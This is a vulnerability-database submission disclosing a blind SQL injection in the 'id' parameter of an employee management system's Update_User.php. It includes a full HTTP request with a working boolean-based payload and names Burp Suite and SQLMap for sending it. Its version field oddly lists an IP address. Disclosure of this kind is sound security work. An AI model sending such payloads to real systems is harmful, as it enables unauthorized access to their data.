| Title | mayuri_k Web 1 SQL Injection |
|---|
| Description | Exploit Title:
SQL Injection Vulnerability in Employee Management System
Date:
04/02/2025
Exploit Author:
Xcode0x
Twitter: @xcode0x
Vendor Homepage:
[www.mayurik.com]
Software Link:
[Not provided]
Version:
v1.0
Tested on:
Kali Linux
SQL Injection Details:
The web application is vulnerable to a blind SQL injection on the endpoint /hr_soft/admin/Update_User.php. By injecting SQL payloads into the id parameter, attackers can execute arbitrary SQL commands on the database, potentially extracting sensitive information or gaining unauthorized access to the system.
Endpoint:
POST /hr_soft/admin/Update_User.php
Example Vulnerable Request:
http
Copy
Edit
POST /hr_soft/admin/Update_User.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Origin: http://x.x.x.x
Connection: keep-alive
Referer: http://x.x.x.x/hr_soft/admin/View_user.php
Cookie: PHPSESSID=07e2sedv7t9ac46ep6u7iu2kng
Upgrade-Insecure-Requests: 1
Priority: u=0, i
id=69' RLIKE (SELECT (CASE WHEN (4038=4038) THEN 69 ELSE 0x28 END)) AND 'cKHc'='cKHc
Proof of Concept (POC):
Send the payload id=69' RLIKE (SELECT (CASE WHEN (4038=4038) THEN 69 ELSE 0x28 END)) AND 'cKHc'='cKHc in the id parameter using a tool like Burp Suite or manually via SQLMap.
The server confirms the payload execution without errors, indicating a successful SQL injection vulnerability. |
|---|
| User | xcode0x (UID 39076) |
|---|
| Submission | 02/04/2025 10:21 AM (4 months ago) |
|---|
| Moderation | 02/10/2025 09:54 AM (6 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 295070 [Mayuri K Employee Management System up to 192.168.70.3 Update_User.php ID sql injection] |
|---|
| Points | 16 |
|---|